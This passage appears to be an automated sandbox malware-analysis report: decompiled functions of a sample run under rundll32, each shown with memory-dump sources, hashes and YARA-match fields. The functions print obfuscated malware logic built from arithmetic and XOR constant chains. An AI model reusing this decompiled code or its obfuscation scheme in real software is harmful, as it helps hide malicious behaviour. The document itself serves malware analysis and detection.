                                                                      • Instruction Fuzzy Hash: 0C511371C1021EEBDF09DFA5D9468EEBBBAFF44304F608118E412B6264D7B45A29CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E01FFA525(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				unsigned int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				char _v48;
                                                                      				void* _t124;
                                                                      				signed int _t129;
                                                                      				signed int _t130;
                                                                      				signed int _t131;
                                                                      				signed int _t132;
                                                                      				void* _t148;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_v48 = 0x104;
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(0x104);
                                                                      				E02002550(0x104);
                                                                      				_v8 = 0x5228;
                                                                      				_t148 = 0;
                                                                      				_t129 = 0x75;
                                                                      				_v8 = _v8 / _t129;
                                                                      				_t130 = 0x18;
                                                                      				_v8 = _v8 / _t130;
                                                                      				_v8 = _v8 + 0x75ec;
                                                                      				_v8 = _v8 ^ 0x00006735;
                                                                      				_v24 = 0x3444;
                                                                      				_v24 = _v24 | 0x67f8f53e;
                                                                      				_v24 = _v24 >> 0xf;
                                                                      				_v24 = _v24 ^ 0x00009a34;
                                                                      				_v16 = 0xef12;
                                                                      				_v16 = _v16 >> 7;
                                                                      				_t131 = 0x4c;
                                                                      				_v16 = _v16 * 0x61;
                                                                      				_v16 = _v16 + 0x9bb9;
                                                                      				_v16 = _v16 ^ 0x00012294;
                                                                      				_v44 = 0xb0ea;
                                                                      				_v44 = _v44 + 0xffff7f2b;
                                                                      				_v44 = _v44 ^ 0x00003439;
                                                                      				_v28 = 0xbc68;
                                                                      				_v28 = _v28 << 2;
                                                                      				_v28 = _v28 ^ 0x0b04eabb;
                                                                      				_v28 = _v28 ^ 0x0b06595b;
                                                                      				_v40 = 0x8c64;
                                                                      				_v40 = _v40 * 5;
                                                                      				_v40 = _v40 + 0x4c62;
                                                                      				_v40 = _v40 ^ 0x00036b68;
                                                                      				_v36 = 0xe385;
                                                                      				_v36 = _v36 << 7;
                                                                      				_t132 = 5;
                                                                      				_v36 = _v36 / _t131;
                                                                      				_v36 = _v36 ^ 0x000154a9;
                                                                      				_v20 = 0xd5bf;
                                                                      				_v20 = _v20 + 0x3bce;
                                                                      				_v20 = _v20 >> 0xb;
                                                                      				_v20 = _v20 | 0xfc33a738;
                                                                      				_v20 = _v20 ^ 0xfc33f58d;
                                                                      				_v32 = 0xac74;
                                                                      				_v32 = _v32 << 0xf;
                                                                      				_v32 = _v32 / _t132;
                                                                      				_v32 = _v32 ^ 0x113ecb06;
                                                                      				_v12 = 0x99c5;
                                                                      				_v12 = _v12 << 0xa;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 | 0x7a8586f5;
                                                                      				_v12 = _v12 ^ 0x7a85defd;
                                                                      				_t124 = E02003358(_t132, _v12, _t132, _t132, _a8);
                                                                      				_t147 = _t124;
                                                                      				if(_t124 != 0) {
                                                                      					_push(_t132);
                                                                      					_t148 = E02001B9D(_v16, _v44, _a4, _v28, _t147,  &_v48);
                                                                      					E01FFF1ED(_v40, _v36, _v20, _v32, _t147);
                                                                      				}
                                                                      				return _t148;
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2bbadcc866d8b4040baa0a8c8f4469103875442558c010708b315e9b0989b624
                                                                      • Instruction ID: 09e02359150feb6c844553e65da193b17205c0893fb23062b5c0839ebdcaac6a
                                                                      • Opcode Fuzzy Hash: 2bbadcc866d8b4040baa0a8c8f4469103875442558c010708b315e9b0989b624
                                                                      • Instruction Fuzzy Hash: 6A5115B1D0020DEBEF09CFE5C84A8DEBBB6EB48318F208159D514B6290D7B95B45DFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 131e7aa17b19979d871cdb98180a0e79ec1912da9ff08fe787abe98a1c671a6b
                                                                      • Instruction ID: 0f571226c79ac72be3702b5d1e7757603c656335b23ca7baae7702d051244f61
                                                                      • Opcode Fuzzy Hash: 131e7aa17b19979d871cdb98180a0e79ec1912da9ff08fe787abe98a1c671a6b
                                                                      • Instruction Fuzzy Hash: CE5117B1D00209EBDF09CFE1C94A8DEBBB5EB48314F208159E414B6290D7B95B55CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E01FFA6C9(void* __eflags) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				char _v40;
                                                                      				char _v560;
                                                                      				intOrPtr* _t92;
                                                                      
                                                                      				_v40 = 0;
                                                                      				_v8 = 0xf494;
                                                                      				_v8 = _v8 >> 0xa;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 | 0xf278016b;
                                                                      				_v8 = _v8 ^ 0xf2787422;
                                                                      				_v24 = 0xcf3b;
                                                                      				_v24 = _v24 + 0xffff718a;
                                                                      				_push(0x48);
                                                                      				_pop(0);
                                                                      				_v24 = _v24 / 0;
                                                                      				_v24 = _v24 ^ 0x00007af7;
                                                                      				_v32 = 0xe834;
                                                                      				_v32 = _v32 + 0x185d;
                                                                      				_v32 = _v32 >> 4;
                                                                      				_v32 = _v32 ^ 0x000037bf;
                                                                      				_v20 = 0xef96;
                                                                      				_v20 = _v20 + 0xffffdb9a;
                                                                      				_v20 = _v20 * 0x73;
                                                                      				_v20 = _v20 ^ 0x005b1c49;
                                                                      				_v36 = 0x968d;
                                                                      				_v36 = _v36 >> 8;
                                                                      				_v36 = _v36 ^ 0x000009ee;
                                                                      				_v28 = 0x17aa;
                                                                      				_v28 = _v28 / 0;
                                                                      				_v28 = _v28 * 0x3a;
                                                                      				_v28 = _v28 ^ 0x00000fdd;
                                                                      				_v12 = 0xb689;
                                                                      				_v12 = _v12 * 0x6c;
                                                                      				_v12 = _v12 >> 0x10;
                                                                      				_v12 = _v12 >> 1;
                                                                      				_v12 = _v12 ^ 0x00007e37;
                                                                      				_v16 = 0xc92d;
                                                                      				_v16 = _v16 >> 5;
                                                                      				_v16 = _v16 | 0xe8c7394a;
                                                                      				_v16 = _v16 ^ 0xe8c76f48;
                                                                      				if(E01FFC931( &_v560, _v8, _v24, _v32) != 0) {
                                                                      					_t92 =  &_v560;
                                                                      					if(_v560 != 0) {
                                                                      						while( *_t92 != 0x5c) {
                                                                      							_t92 = _t92 + 2;
                                                                      							if( *_t92 != 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      							}
                                                                      							goto L6;
                                                                      						}
                                                                      						 *((short*)(_t92 + 2)) = 0;
                                                                      					}
                                                                      					L6:
                                                                      					E0200E0AF(0, _v20, 0, _v36, 0,  &_v40, _v28, 0,  &_v560, 0, _v12, 0, _v16);
                                                                      				}
                                                                      				return _v40;
                                                                      			}
                                                                      0x00000000
                                                                      0x01ffa7e8
                                                                      0x01ffa7ee
                                                                      0x01ffa7ee
                                                                      0x01ffa7f2
                                                                      0x01ffa811
                                                                      0x01ffa816
                                                                      0x01ffa820

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
                                                                      • Instruction ID: aea2d6f94327fc1418d11e7f3db1f933b5333d8f31434ae258a634ded82424e6
                                                                      • Opcode Fuzzy Hash: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
                                                                      • Instruction Fuzzy Hash: 7A41E472C0021EABDF19CFA5C94A9EEBBB5FB04304F208199D115B61A0D3B95B59CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
                                                                      • Instruction ID: c183fd4c343abe9295d6eb68c285cf492b1636a18e48cf87bc94fd6402f20064
                                                                      • Opcode Fuzzy Hash: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
                                                                      • Instruction Fuzzy Hash: 6F4102B2C0020EABDF19DFE1D84A9EEBBB5FB04304F208199D014B61A0D3B95B59CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E0200D4E1(void* __ecx, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				unsigned int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				char _v40;
                                                                      				signed int _t103;
                                                                      				signed int _t107;
                                                                      				signed int _t108;
                                                                      				signed int _t109;
                                                                      				void* _t117;
                                                                      				void* _t118;
                                                                      				signed int _t119;
                                                                      				void* _t122;
                                                                      
                                                                      				_t122 = __eflags;
                                                                      				_v8 = 0x9d48;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_t118 = __ecx;
                                                                      				_t107 = 0xc;
                                                                      				_v8 = _v8 / _t107;
                                                                      				_v8 = _v8 ^ 0x84a8c1f7;
                                                                      				_v8 = _v8 ^ 0x849ce678;
                                                                      				_v16 = 0x4884;
                                                                      				_v16 = _v16 + 0xfffff3b9;
                                                                      				_v16 = _v16 ^ 0x6bddc2ef;
                                                                      				_v16 = _v16 >> 0xf;
                                                                      				_v16 = _v16 ^ 0x0000e0dc;
                                                                      				_v12 = 0x1ff1;
                                                                      				_t108 = 0x5e;
                                                                      				_v12 = _v12 * 0x6e;
                                                                      				_v12 = _v12 << 0xe;
                                                                      				_v12 = _v12 * 0xd;
                                                                      				_v12 = _v12 ^ 0x9b0dd4a2;
                                                                      				_v28 = 0x87c6;
                                                                      				_v28 = _v28 + 0xffff61ee;
                                                                      				_v28 = _v28 / _t108;
                                                                      				_v28 = _v28 ^ 0x02b97512;
                                                                      				_v24 = 0x2da2;
                                                                      				_v24 = _v24 + 0xffff2827;
                                                                      				_v24 = _v24 + 0xffff9d22;
                                                                      				_v24 = _v24 ^ 0xfffeb986;
                                                                      				_v20 = 0x7758;
                                                                      				_v20 = _v20 >> 0xf;
                                                                      				_v20 = _v20 | 0x0ba9e341;
                                                                      				_v20 = _v20 ^ 0x0ba99bf4;
                                                                      				_v36 = 0x8619;
                                                                      				_v36 = _v36 ^ 0x2bac5130;
                                                                      				_v36 = _v36 ^ 0x2bac97af;
                                                                      				_v40 = E01FFA156();
                                                                      				_v32 = 0x8f7a;
                                                                      				_t109 = 0x71;
                                                                      				_v32 = _v32 / _t109;
                                                                      				_v32 = _v32 ^ 0x00000141;
                                                                      				_v8 = 0xc831;
                                                                      				_v8 = _v8 + 0xffffeaea;
                                                                      				_v8 = _v8 >> 2;
                                                                      				_v8 = _v8 ^ 0x00002cd6;
                                                                      				_t103 = E01FFDF8A(_t109, _v32 % _t109, _t122, _v8, _v32);
                                                                      				_push(_v36);
                                                                      				_t119 = _t103;
                                                                      				_push(_v20);
                                                                      				_push(_v24);
                                                                      				_push(_t118);
                                                                      				_push(_t119);
                                                                      				_push(_v28);
                                                                      				_t117 = 3;
                                                                      				E02009A27( &_v40, _t117);
                                                                      				 *((short*)(_t118 + _t119 * 2)) = 0;
                                                                      				return 0;
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
                                                                      • Instruction ID: c0d4a1055e143fcd9f15d57e7d446460813811721464b67cefbc49e9c5eaa867
                                                                      • Opcode Fuzzy Hash: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
                                                                      • Instruction Fuzzy Hash: 80410372D0120AEBDF08CFE5D94A9DEBBB1FB44304F208199E215B62A0D7B94B55DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
                                                                      • Instruction ID: 2e26358b028229237488a13de3275f8f71427765ad45d5d1482eef6a0940de73
                                                                      • Opcode Fuzzy Hash: a434f546294ff16000c075816f5c378907933f48be170b95346e54a9c6ecf090
                                                                      • Instruction Fuzzy Hash: 0641F472D0120AEBDF08CFE5D94A9DEBBB1FB44304F208199E211BA1A0D7B94B55DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E02000B8A(void* __ecx, signed int __edx) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _t100;
                                                                      				signed int _t101;
                                                                      
                                                                      				_v36 = 0x5aa;
                                                                      				_v36 = _v36 >> 0x10;
                                                                      				_v36 = _v36 ^ 0x0000330c;
                                                                      				_v32 = 0xdf00;
                                                                      				_v32 = _v32 | 0xab132c2b;
                                                                      				_v32 = _v32 ^ 0xab13f0c0;
                                                                      				_v8 = 0x63ed;
                                                                      				_t100 = __edx;
                                                                      				_v8 = _v8 * 0x4e;
                                                                      				_v8 = _v8 ^ 0xf2c24d67;
                                                                      				_v8 = _v8 ^ 0x1b3721e6;
                                                                      				_v8 = _v8 ^ 0xe9eb1c06;
                                                                      				_v24 = 0xe288;
                                                                      				_v24 = _v24 + 0xbb54;
                                                                      				_v24 = _v24 + 0xdb0d;
                                                                      				_v24 = _v24 ^ 0x00023210;
                                                                      				_v40 = 0x5eed;
                                                                      				_v40 = _v40 + 0xffff6eb1;
                                                                      				_v40 = _v40 ^ 0xfffff76e;
                                                                      				_v12 = 0x6942;
                                                                      				_v12 = _v12 << 0xe;
                                                                      				_v12 = _v12 >> 4;
                                                                      				_t101 = 0xb;
                                                                      				_push(__ecx);
                                                                      				_v12 = _v12 / _t101;
                                                                      				_v12 = _v12 ^ 0x00267602;
                                                                      				_v28 = 0x620d;
                                                                      				_v28 = _v28 + 0xffff96d2;
                                                                      				_v28 = _v28 << 0xa;
                                                                      				_v28 = _v28 ^ 0xffe35567;
                                                                      				_v20 = 0x2a57;
                                                                      				_v20 = _v20 << 6;
                                                                      				_v20 = _v20 ^ 0x7bcf801d;
                                                                      				_v20 = _v20 * 0x1d;
                                                                      				_v20 = _v20 ^ 0x05537e8d;
                                                                      				_v16 = 0x5dcb;
                                                                      				_v16 = _v16 << 0xb;
                                                                      				_v16 = _v16 | 0x4e4aa2fe;
                                                                      				_v16 = _v16 + 0x15cc;
                                                                      				_v16 = _v16 ^ 0x4eef698c;
                                                                      				_push(_v24);
                                                                      				_push(_v8);
                                                                      				 *((intOrPtr*)( *0x2011080 + 0x1c + _t100 * 4)) = E020049CF(_v40, _v12, E01FF5DFC(_v36, _v32, _v16));
                                                                      				return E02000D6D(_v28, _v20, _v16, _t86);
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be845ad11959adaad790ebe7d4dc555bbf68bf08421f9ff1a6cb0869c00de1ff
                                                                      • Instruction ID: a367857103724a2826d303a9e1efe929e077125475e99df1c231b476f599187d
                                                                      • Opcode Fuzzy Hash: be845ad11959adaad790ebe7d4dc555bbf68bf08421f9ff1a6cb0869c00de1ff
                                                                      • Instruction Fuzzy Hash: 8231EF71C0121AEBDB58DFA5D94A4DEBBB1FB44314F208599C122B72A0D7B94B05CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c95661d2484b6314445495ddb305d22a50364b520d0b0d89c1b5f7c49ec30cd5
                                                                      • Instruction ID: 423b90169c0635f08b7e144b8b37609ce883b47a2eca9b9fc62eb3e7f742a849
                                                                      • Opcode Fuzzy Hash: c95661d2484b6314445495ddb305d22a50364b520d0b0d89c1b5f7c49ec30cd5
                                                                      • Instruction Fuzzy Hash: C331F1B1C0061AEBDF58CFA5C94A4DEBBB1FB44314F208199C122B7290D7B94B55CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E01FF7378(intOrPtr _a8, intOrPtr _a16, signed int _a20) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				void* _v48;
                                                                      				intOrPtr _v52;
                                                                      				void* _t84;
                                                                      				signed int _t86;
                                                                      				signed int _t92;
                                                                      
                                                                      				_v52 = 0x16987;
                                                                      				_t92 = _a20;
                                                                      				asm("stosd");
                                                                      				_t86 = 0x19;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_v32 = 0xbca3;
                                                                      				_v32 = _v32 + 0xffa8;
                                                                      				_v32 = _v32 ^ 0x0001b5a0;
                                                                      				_v28 = 0x7499;
                                                                      				_v28 = _v28 ^ 0x8b4212c4;
                                                                      				_v28 = _v28 ^ 0x8b424b18;
                                                                      				_v24 = 0x998c;
                                                                      				_v24 = _v24 + 0xffffcf68;
                                                                      				_v24 = _v24 ^ 0x0000327c;
                                                                      				_v20 = 0xcacf;
                                                                      				_v20 = _v20 << 6;
                                                                      				_v20 = _v20 ^ 0x0032e4d9;
                                                                      				_v36 = 0xb036;
                                                                      				_v36 = _v36 * 0x6f;
                                                                      				_v36 = _v36 ^ 0x004c1ab0;
                                                                      				_v16 = 0xe7fa;
                                                                      				_v16 = _v16 >> 0xe;
                                                                      				_v16 = _v16 * 0x72;
                                                                      				_v16 = _v16 ^ 0x0000227a;
                                                                      				_v12 = 0xf6b9;
                                                                      				_v12 = _v12 | 0x229c8a7f;
                                                                      				_v12 = _v12 << 0x10;
                                                                      				_v12 = _v12 ^ 0x08e044b9;
                                                                      				_v12 = _v12 ^ 0xf61f6f05;
                                                                      				_v8 = 0xd627;
                                                                      				_v8 = _v8 ^ 0xe545ff33;
                                                                      				_v8 = _v8 / _t86;
                                                                      				_v8 = _v8 | 0x013bd0a8;
                                                                      				_v8 = _v8 ^ 0x093b8413;
                                                                      				if( *((intOrPtr*)(0x2010408 + _t92 * 4)) == 0) {
                                                                      					_push(_t86);
                                                                      					_push(_t86);
                                                                      					_t84 = E02000223(_a16);
                                                                      					_push(_a8);
                                                                      					_push(_v8);
                                                                      					_push(_v12);
                                                                      					_push(_v16);
                                                                      					 *((intOrPtr*)(0x2010408 + _t92 * 4)) = E0200C4DD(_v36, _t84);
                                                                      				}
                                                                      				return  *((intOrPtr*)(0x2010408 + _t92 * 4));
                                                                      			}

















                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5614f9c998030e705bf9431ad396a74a195a7eab51c6da394f206f8cf5ef5e9
                                                                      • Instruction ID: ff53ea96efa840fb829be5974939e238b7570f9aa468a8d80c1c85b4e346b8f8
                                                                      • Opcode Fuzzy Hash: d5614f9c998030e705bf9431ad396a74a195a7eab51c6da394f206f8cf5ef5e9
                                                                      • Instruction Fuzzy Hash: B03102B5D0021DEFEF44DFA8D94A4EEBBB5FB48304F108159E911B62A0D3B84A45DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 67%
                                                                      			E01FF5418(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				unsigned int _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				void* _t53;
                                                                      				signed int _t66;
                                                                      				signed int _t67;
                                                                      				void* _t79;
                                                                      				intOrPtr _t80;
                                                                      
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t53);
                                                                      				_v32 = 0x6749d6;
                                                                      				_t80 = 0;
                                                                      				_v28 = 0;
                                                                      				_v24 = 0;
                                                                      				_v16 = 0xfeb6;
                                                                      				_v16 = _v16 ^ 0x1a3a87a5;
                                                                      				_v16 = _v16 >> 2;
                                                                      				_v16 = _v16 ^ 0x068ee483;
                                                                      				_v12 = 0xf4bf;
                                                                      				_v12 = _v12 << 5;
                                                                      				_v12 = _v12 >> 6;
                                                                      				_v12 = _v12 ^ 0x00001984;
                                                                      				_v20 = 0x5159;
                                                                      				_v20 = _v20 >> 0xa;
                                                                      				_v20 = _v20 ^ 0x00003ebb;
                                                                      				_v8 = 0x7bf9;
                                                                      				_t66 = 0x7e;
                                                                      				_v8 = _v8 / _t66;
                                                                      				_v8 = _v8 ^ 0xf75420d9;
                                                                      				_t67 = 0x73;
                                                                      				_v8 = _v8 / _t67;
                                                                      				_v8 = _v8 ^ 0x0226967d;
                                                                      				_t79 = E01FF54FB(0x40000);
                                                                      				if(_t79 != 0) {
                                                                      					_push(_t79);
                                                                      					_push(_a4);
                                                                      					_push(_a20);
                                                                      					_t80 = E020016E0(_a12, _a16);
                                                                      					E01FFDE81(_v20, _t79, _v8);
                                                                      				}
                                                                      				return _t80;
                                                                      			}
















                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5c524b21261d76773f5d7c74b417b0e1b019995d9dbf959723682bfc805f13a9
                                                                      • Instruction ID: a6cdbe875ef7d5885f3882f30b64b6b775b65269ff3d417b78d660ea2abbcd37
                                                                      • Opcode Fuzzy Hash: 5c524b21261d76773f5d7c74b417b0e1b019995d9dbf959723682bfc805f13a9
                                                                      • Instruction Fuzzy Hash: 97213772E00209EBDF05DFE9D8099DFBBB2EF44704F108099E914A7260D7B69A14DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E01FFDE81(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				void* _t61;
                                                                      				signed int _t71;
                                                                      
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t61);
                                                                      				_v8 = 0x815e;
                                                                      				_v8 = _v8 | 0x0f7b832c;
                                                                      				_t71 = 0x1f;
                                                                      				_v8 = _v8 / _t71;
                                                                      				_v8 = _v8 ^ 0x007fc6d9;
                                                                      				_v20 = 0x1739;
                                                                      				_v20 = _v20 | 0x0d3215ff;
                                                                      				_v20 = _v20 ^ 0x0d32419d;
                                                                      				_v24 = 0x65f5;
                                                                      				_v24 = _v24 + 0x3c25;
                                                                      				_v24 = _v24 ^ 0x0000c547;
                                                                      				_v16 = 0xa0ce;
                                                                      				_v16 = _v16 + 0xefa2;
                                                                      				_v16 = _v16 >> 6;
                                                                      				_v16 = _v16 ^ 0x00000fc3;
                                                                      				_v16 = 0x5b12;
                                                                      				_v16 = _v16 | 0xa0c0d766;
                                                                      				_v16 = _v16 * 0x44;
                                                                      				_v16 = _v16 ^ 0xb33b088d;
                                                                      				_v24 = 0x32c7;
                                                                      				_v24 = _v24 ^ 0x4853b697;
                                                                      				_v24 = _v24 ^ 0x4853c8a7;
                                                                      				_v16 = 0x1aa;
                                                                      				_v16 = _v16 + 0x7f2c;
                                                                      				_v16 = _v16 | 0xff30d166;
                                                                      				_v16 = _v16 ^ 0xff30c9aa;
                                                                      				_v12 = 0xd947;
                                                                      				_v12 = _v12 ^ 0x0ebf1cd4;
                                                                      				_v12 = _v12 + 0xffff3fa5;
                                                                      				_v12 = _v12 ^ 0x0ebf1307;
                                                                      				return E01FF3A9D(__edx, _v24, _v16, _v12, _t71, E01FF7AA1(_t71));
                                                                      			}











                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47619f77d15d650af17f0a4cc88ed58ba79014e9d70a39a1b2907f2ac558bd10
                                                                      • Instruction ID: 57bc9e22b9b28e086796ccfaf650521b6bf26ba4b911a1a0abde5365d13790b4
                                                                      • Opcode Fuzzy Hash: 47619f77d15d650af17f0a4cc88ed58ba79014e9d70a39a1b2907f2ac558bd10
